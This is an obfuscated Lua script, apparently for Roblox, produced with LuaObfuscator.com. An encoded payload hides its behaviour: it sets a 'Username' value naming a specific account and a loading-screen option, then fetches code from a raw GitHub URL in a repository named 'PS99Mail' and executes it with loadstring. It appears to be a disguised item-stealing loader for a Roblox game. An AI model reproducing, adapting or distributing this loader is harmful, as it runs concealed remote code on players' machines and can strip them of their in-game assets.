--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.2) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function() return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...) local v18=0;local v19;local v20;local v21;local v22;local v23;local v24;local v25;local v26;local v27;local v28;local v29;local v30;while true do if (v18==1) then v21=nil;function v21(v31,v32,v33) if v33 then local v71=(0 -0) -0 ;local v72;while true do if (v71==(0 -0)) then v72=(v31/((3 -1)^(v32-((1067 -(68 + 997)) -1))))%((621 -(555 + (1334 -(226 + 1044))))^(((v33-((4058 -3126) -(857 + 74))) -(v32-(569 -(367 + 201)))) + (928 -(214 + 713)))) ;return v72-(v72%(1 + 0)) ;end end else local v73=(1 + 1)^(v32-(878 -(282 + 595))) ;return (((v31%(v73 + v73))>=v73) and (1638 -(1523 + 114))) or (0 + 0) ;end end v22=nil;v18=2;end if (v18==2) then function v22() local v34=117 -(32 + 85) ;local v35;while true do if (v34==(1 + (0 -0))) then return v35;end if (v34==(0 + 0)) then v35=v1(v16,v19,v19);v19=v19 + (958 -(892 + 65)) ;v34=2 -1 ;end end end v23=nil;function v23() local v36,v37=v1(v16,v19,v19 + (3 -1) );v19=v19 + (352 -(87 + 263)) ;return (v37 * 256) + v36 ;end v18=3;end if (v18==3) then v24=nil;function v24() local v38=(326 -146) -(67 + 113) ;local v39;local v40;local v41;local v42;while true do if (v38==(1 + 0)) then return (v42 * (41190819 -24413603)) + (v41 * (48199 + 12620 + 4717)) + (v40 * 256) + v39 ;end if (v38==(0 -(997 -(915 + 82)))) then v39,v40,v41,v42=v1(v16,v19,v19 + (955 -(802 + 150)) );v19=v19 + (10 -6) ;v38=1;end end end v25=nil;v18=4;end if (v18==5) then v27=v24;v28=nil;function v28(...) return {...},v12("#",...);end v18=6;end if (4==v18) then function v25() local v43=v24();local v44=v24();local v45=2 -1 ;local v46=(v21(v44,1 + 0 ,26 -6 ) * ((1189 -(1069 + 118))^(72 -40))) + v43 ;local v47=v21(v44,45 -24 ,6 + 21 + 4 );local v48=((v21(v44,32)==(1 -0)) and  -(1 + (772 -(201 + 571)))) or (792 -((1506 -(116 + 1022)) + 423)) ;if (v47==(0 -0)) then if (v46==((74 -56) -(10 + 8))) then return v48 * (0 -0) ;else local v80=442 -(416 + 26) ;while true do if (v80==0) then v47=3 -2 ;v45=0 + 0 ;break;end end end elseif (v47==(3621 -(924 + 650))) then return ((v46==(438 -((529 -384) + 293))) and (v48 * ((3 -2)/(430 -(44 + 386))))) or (v48 * NaN) ;end return v8(v48,v47-1023 ) * (v45 + (v46/((1488 -((1857 -(814 + 45)) + (1202 -714)))^(17 + 35)))) ;end v26=nil;function v26(v49) local v50;if  not v49 then local v74=0 + (1080 -(1020 + 60)) ;while true do if (v74==(0 + 0)) then v49=v24();if (v49==(885 -(261 + 624))) then return "";end break;end end end v50=v3(v16,v19,(v19 + v49) -1 );v19=v19 + v49 ;local v51={};for v67=1 -0 , #v50 do v51[v67]=v2(v1(v3(v50,v67,v67)));end return v6(v51);end v18=5;end if (0==v18) then v19=1;v20=nil;v16=v4(v3(v16,5),"..",function(v52) if (v1(v52,2)==79) then v20=v0(v3(v52,1,1));return "";else local v75=0;local v76;while true do if (v75==0) then v76=v2(v0(v52,16));if v20 then local v97=v5(v76,v20);v20=nil;return v97;else return v76;end break;end end end end);v18=1;end if (v18==7) then function v30(v53,v54,v55) local v56=0;local v57;local v58;local v59;while true do if (v56==1) then v59=v53[3];return function(...) local v81=v57;local v82=v58;local v83=v59;local v84=v28;local v85=1;local v86= -1;local v87={};local v88={...};local v89=v12("#",...) -1 ;local v90={};local v91={};for v95=0,v89 do if (v95>=v83) then v87[v95-v83 ]=v88[v95 + 1 ];else v91[v95]=v88[v95 + 1 ];end end local v92=(v89-v83) + 1 ;local v93;local v94;while true do local v96=0;while true do if (v96==1) then if (v94<=11) then if (v94<=5) then if (v94<=2) then if (v94<=0) then v91[v93[2]]=v93[3];elseif (v94>1) then do return;end else local v134=v93[2];local v135,v136=v84(v91[v134](v13(v91,v134 + 1 ,v93[3])));v86=(v136 + v134) -1 ;local v137=0;for v158=v134,v86 do local v159=0;while true do if (v159==0) then v137=v137 + 1 ;v91[v158]=v135[v137];break;end end end end elseif (v94<=3) then local v120=v93[2];v91[v120]=v91[v120](v13(v91,v120 + 1 ,v86));elseif (v94>4) then local v138=0;local v139;local v140;while true do if (v138==0) then v139=v93[2];v140=v91[v93[3]];v138=1;end if (v138==1) then v91[v139 + 1 ]=v140;v91[v139]=v140[v93[4]];break;end end else v55[v93[3]]=v91[v93[2]];end elseif (v94<=8) then if (v94<=6) then local v122=v93[2];local v123=v91[v93[3]];v91[v122 + 1 ]=v123;v91[v122]=v123[v93[4]];elseif (v94>7) then if (v91[v93[2]]==v93[4]) then v85=v85 + 1 ;else v85=v93[3];end else v91[v93[2]]=v93[3]~=0 ;end elseif (v94<=9) then if ((v93[3]=="_ENV") or (v93[3]=="getfenv")) then v91[v93[2]]=v55;else v91[v93[2]]=v55[v93[3]];end elseif (v94>10) then v85=v93[3];else v55[v93[3]]=v91[v93[2]];end elseif (v94<=17) then if (v94<=14) then if (v94<=12) then for v130=v93[2],v93[3] do v91[v130]=nil;end elseif (v94==13) then local v150=v93[2];v91[v150]=v91[v150](v13(v91,v150 + 1 ,v86));else local v152=0;local v153;local v154;local v155;local v156;while true do if (v152==0) then v153=v93[2];v154,v155=v84(v91[v153](v13(v91,v153 + 1 ,v93[3])));v152=1;end if (1==v152) then v86=(v155 + v153) -1 ;v156=0;v152=2;end if (v152==2) then for v181=v153,v86 do v156=v156 + 1 ;v91[v181]=v154[v156];end break;end end end elseif (v94<=15) then v85=v93[3];elseif (v94==16) then v91[v93[2]]();else v91[v93[2]]();end elseif (v94<=20) then if (v94<=18) then v91[v93[2]]=v93[3];elseif (v94>19) then do return;end elseif (v91[v93[2]]==v93[4]) then v85=v85 + 1 ;else v85=v93[3];end elseif (v94<=21) then for v132=v93[2],v93[3] do v91[v132]=nil;end elseif (v94>22) then v91[v93[2]]=v93[3]~=0 ;elseif ((v93[3]=="_ENV") or (v93[3]=="getfenv")) then v91[v93[2]]=v55;else v91[v93[2]]=v55[v93[3]];end v85=v85 + 1 ;break;end if (v96==0) then v93=v81[v85];v94=v93[1];v96=1;end end end end;end if (v56==0) then v57=v53[1];v58=v53[2];v56=1;end end end return v30(v29(),{},v17)(...);end if (v18==6) then v29=nil;function v29() local v60=0 + 0 ;local v61;local v62;local v63;local v64;local v65;local v66;while true do local v69=0;local v70;while true do if (v69==0) then v70=0;while true do if ((1 + 0)~=v70) then else if (2==v60) then local v105=121 -(17 + 104) ;local v106;while true do if (v105~=(0 -0)) then else v106=0 + 0 ;while true do local v109=0;while true do if ((0 + 0)~=v109) then else if (v106==(0 -0)) then for v160=1 -0 ,v24() do local v161=0;local v162;local v163;while true do if (v161~=(0 + 0)) then else v162=1636 -(1373 + 263) ;v163=nil;v161=1;end if (v161~=1) then else while true do if (v162~=(1000 -(451 + 549))) then else v163=v22();if (v21(v163,1 + 0 ,1)==(0 -0)) then local v187=0;local v188;local v189;local v190;local v191;local v192;local v193;while true do if ((0 -0)~=v187) then else v188=1384 -(746 + 638) ;v189=nil;v187=1;end if ((1 + 0)==v187) then v190=nil;v191=nil;v187=2 -0 ;end if (3~=v187) then else while true do if (v188~=0) then else local v194=0;while true do if (v194~=(342 -(218 + 123))) then else v188=1582 -(1535 + 46) ;break;end if (v194~=(0 + 0)) then else v189=0 + 0 ;v190=nil;v194=1;end end end if (v188~=(562 -(306 + 254))) then else v193=nil;while true do if (v189==(1 + 1)) then while true do if (v190~=(3 -1)) then else local v198=1467 -(899 + 568) ;local v199;while true do if (v198==(0 + 0)) then v199=0 -0 ;while true do if (1==v199) then v190=606 -(268 + 335) ;break;end if (v199==(290 -(60 + 230))) then local v209=572 -(426 + 146) ;local v210;while true do if (0~=v209) then else v210=0;while true do if (v210~=(1 + 0)) then else v199=1457 -(282 + 1174) ;break;end if (v210~=0) then else if (v21(v192,1,812 -(569 + 242) )==(2 -1)) then v193[2]=v66[v193[1 + 1 ]];end if (v21(v192,1026 -(706 + 318) ,1253 -(721 + 530) )==1) then v193[1274 -(945 + 326) ]=v66[v193[7 -4 ]];end v210=1 + 0 ;end end break;end end end end break;end end end if (v190==0) then local v200=0;local v201;local v202;while true do if (v200==0) then v201=0;v202=nil;v200=1;end if (v200~=(701 -(271 + 429))) then else while true do if (v201==0) then v202=0;while true do if (v202~=0) then else local v214=0 + 0 ;while true do if (v214~=(1500 -(1408 + 92))) then else v191=v21(v163,2,3);v192=v21(v163,4,6);v214=1;end if (v214~=1) then else v202=1;break;end end end if (v202==1) then v190=1;break;end end break;end end break;end end end if (v190~=(1087 -(461 + 625))) then else local v203=0;while true do if (v203~=0) then else v193={v23(),v23(),nil,nil};if (v191==0) then local v208=0;while true do if (v208~=(0 + 0)) then else v193[1174 -(418 + 753) ]=v23();v193[4]=v23();break;end end elseif (v191==(1 + 0)) then v193[1 + 2 ]=v24();elseif (v191==2) then v193[3]=v24() -(2^16) ;elseif (v191==(1 + 2)) then local v216=0 + 0 ;local v217;while true do if (v216==0) then v217=0;while true do if (0~=v217) then else v193[3]=v24() -((531 -(406 + 123))^(1785 -(1749 + 20))) ;v193[1 + 3 ]=v23();break;end end break;end end end v203=1;end if ((1323 -(1249 + 73))==v203) then v190=2;break;end end end if (v190==(2 + 1)) then if (v21(v192,3,3)~=(1146 -(466 + 679))) then else v193[4]=v66[v193[4]];end v61[v160]=v193;break;end end break;end if (0==v189) then local v196=0;while true do if (v196~=(2 -1)) then else v189=1;break;end if (v196~=0) then else local v205=0;while true do if (1~=v205) then else v196=1;break;end if (v205~=0) then else v190=0;v191=nil;v205=1;end end end end end if (v189~=(2 -1)) then else local v197=0;while true do if (v197~=(1901 -(106 + 1794))) then else v189=2;break;end if (v197~=0) then else v192=nil;v193=nil;v197=1 + 0 ;end end end end break;end if (v188~=(1 + 0)) then else local v195=0 -0 ;while true do if (v195==1) then v188=5 -3 ;break;end if ((114 -(4 + 110))==v195) then v191=nil;v192=nil;v195=585 -(57 + 527) ;end end end end break;end if (v187~=(1429 -(41 + 1386))) then else v192=nil;v193=nil;v187=106 -(17 + 86) ;end end end break;end end break;end end end for v164=1 + 0 ,v24() do v62[v164-(1 -0) ]=v29();end v106=2 -1 ;end if (v106==(167 -(122 + 44))) then return v64;end break;end end end break;end end end break;end if (v70==(0 -0)) then local v102=0 -0 ;while true do if (v102~=(1 + 0)) then else v70=1;break;end if (v102~=(0 + 0)) then else if (v60~=(0 -0)) then else local v107=0;while true do if (v107==(67 -(30 + 35))) then v60=1;break;end if (1==v107) then local v116=0 + 0 ;while true do if (v116~=(1257 -(1043 + 214))) then else v63={};v64={v61,v62,nil,v63};v116=1213 -(323 + 889) ;end if (v116~=(2 -1)) then else v107=582 -(361 + 219) ;break;end end end if ((320 -(53 + 267))==v107) then local v117=0 + 0 ;while true do if ((413 -(15 + 398))==v117) then v61={};v62={};v117=1;end if ((983 -(18 + 964))~=v117) then else v107=3 -2 ;break;end end end end end if (v60~=1) then else v65=v24();v66={};for v110=1,v65 do local v111=0;local v112;local v113;local v114;local v115;while true do if (v111~=(1 + 0)) then else v114=nil;v115=nil;v111=2 + 0 ;end if (v111~=0) then else v112=850 -(20 + 830) ;v113=nil;v111=1;end if (v111~=(2 + 0)) then else while true do if (0==v112) then local v166=126 -(116 + 10) ;local v167;while true do if (0==v166) then v167=0 + 0 ;while true do if (v167==(739 -(542 + 196))) then v112=1;break;end if (v167~=(0 -0)) then else local v186=0 + 0 ;while true do if (v186~=(1 + 0)) then else v167=1 + 0 ;break;end if (0==v186) then v113=0 -0 ;v114=nil;v186=2 -1 ;end end end end break;end end end if (v112~=1) then else v115=nil;while true do if (v113==1) then if (v114==(1552 -(1126 + 425))) then v115=v22()~=(405 -(118 + 287)) ;elseif (v114==2) then v115=v25();elseif (v114==3) then v115=v26();end v66[v110]=v115;break;end if (v113~=(0 -0)) then else local v185=0;while true do if (v185==0) then v114=v22();v115=nil;v185=1122 -(118 + 1003) ;end if (v185~=1) then else v113=1;break;end end end end break;end end break;end end end v64[8 -5 ]=v22();v60=379 -(142 + 235) ;end v102=1;end end end end break;end end end end v30=nil;v18=7;end end end v15("LOL!0B3O00028O00026O00F03F030D3O004C6F6164696E675363722O656E030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403433O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F4C7970686572582F50532O394D61696C2F6D61696E2F4D656D656E746F6D6F726903083O00557365726E616D65030A3O004D61726368626F79313403153O0073656C65637465644C6F6164696E675363722O656E03013O003200243O00124O00014O0015000100013O0026083O00020001000100040B3O0002000100122O000100013O002608000100110001000200040B3O001100012O0017000200013O00120A000200033O001216000200043O001216000300053O00200500030003000600122O000500074O0001000300054O000D00023O00022O001000020001000100040B3O00230001002608000100050001000100040B3O0005000100122O000200013O0026080002001B0001000100040B3O001B000100122O000300093O00120A000300083O00122O0003000B3O00120A0003000A3O00122O000200023O002608000200140001000200040B3O0014000100122O000100023O00040B3O0005000100040B3O0014000100040B3O0005000100040B3O0023000100040B3O000200012O00023O00017O00",v9(),...);
